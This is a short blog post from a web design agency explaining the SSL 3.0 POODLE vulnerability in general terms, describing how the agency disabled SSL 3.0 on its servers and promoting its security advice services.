SSL 3.0 Poodle exploit leaves encrypted data exposed

| Posted by absolute

The latest high-profile security issue to hit the internet is a vulnerability in SSL 3.0, a means of encrypting data via https connections. 

The SSL 3.0 vulnerability, referred to as Poodle, allows attackers to steal cookie data, which often contains login details.

This means that hackers can potentially access private areas of bank websites, social media sites etc using other users’ logins. We routinely use https certificates to secure the Magento ecommerce websites that we build, as well as those CMS sites that contain potentially sensitive data. So it was essential that were responded quickly, re-configuring our servers to remove the risk and prevent similar attacks on the websites that we host.

The simple answer is no. https encryption uses various techniques (called protocols) that communicate between the browser and the server. In fact SSL 3.0 was actually superceded several years ago by TLS (Transport Layer Security), and it is this better protocol that is more commonly used in modern websites.

In normal use this SSL 3.0 vulnerability isn'’t an issue. It is only a problem in the case of some older browsers (Internet Explorer 6 in particular) that don’t support TLS by default. It’s these that would be trying to use SSL 3.0 instead. However, if a browser was compromised by a hacker, it would be possible for them to override the browser’s default behaviour and force it to only negotiate an SSL 3.0 connection, rejecting any offer of a better protocol. This then exposes the encrypted data to the vulnerability.

Considering the age of the protocol and the fact that three versions of TLS have been released since then, the consensus is to stop servers from accepting SSL 3.0. This is the path that we have taken on our servers, as have many of the major players such as Twitter and Facebook. From the browser side, both Mozilla and Google have confirmed that Firefox and Chrome won’t support SSL 3.0 moving forwards. However, be warned, that doesn'’t stop it from being a problem for people with older browsers who have not yet updated.

Make sure your browser and your antivirus software are both up to date, as well as ensuring you perform regular scans of your system. If your website supports https connections and you’re concerned about possible security issues, then contact us. We'’re more than happy to talk through your infrastructure and advise you on what action you should take. Even if you’re not one of our clients! We'’re nice like that.

To find out how Absolute can help you build a new, secure website call Liam Wiltshire on 0115 953 4800 ext 205 or email liam.wiltshire@absolute-design.co.uk.